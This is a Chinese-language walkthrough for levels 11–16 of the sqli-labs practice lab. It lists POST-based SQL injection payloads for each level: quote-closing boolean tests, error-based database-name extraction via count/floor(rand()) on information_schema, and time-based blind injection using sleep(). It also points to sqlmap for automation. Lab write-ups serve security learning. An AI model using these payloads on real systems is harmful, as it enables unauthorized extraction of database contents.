sqli-labs详细通关指南(11~16关)

less-11~16 POST注入

其实原理跟 GET方式的注入是一样,只不过注入方式变成了POST提交方式下的。可以用burp或者是火狐的hackbar去提交相应的POST参数即可。

less11: 

admin’
and 1=1#

less12:

admin“) and 1=1#

less13:

admin’) union select count(*),concat((select
database()),floor(rand()*2))a from information_schema.tables group by a#

less14:

admin”
union select count(*),concat((select database()),floor(rand()*2))a from
information_schema.tables group by a#

less15:

基于时间的POST盲注 单引号闭合

1′
or if((ascii(substr((select table_name from information_schema.tables where
table_schema=database()limit 0,1),1,1)))=101,sleep(2),null) — a

Less-16:

基于时间的POST盲注 双引号闭合

1“ or if((ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1)))=101,sleep(2),null) — a

这种情况一般都采用sqlmap等自动化注入工具了,手工实在是太蛋疼了。

One comment on “sqli-labs详细通关指南(11~16关)

Comments are closed.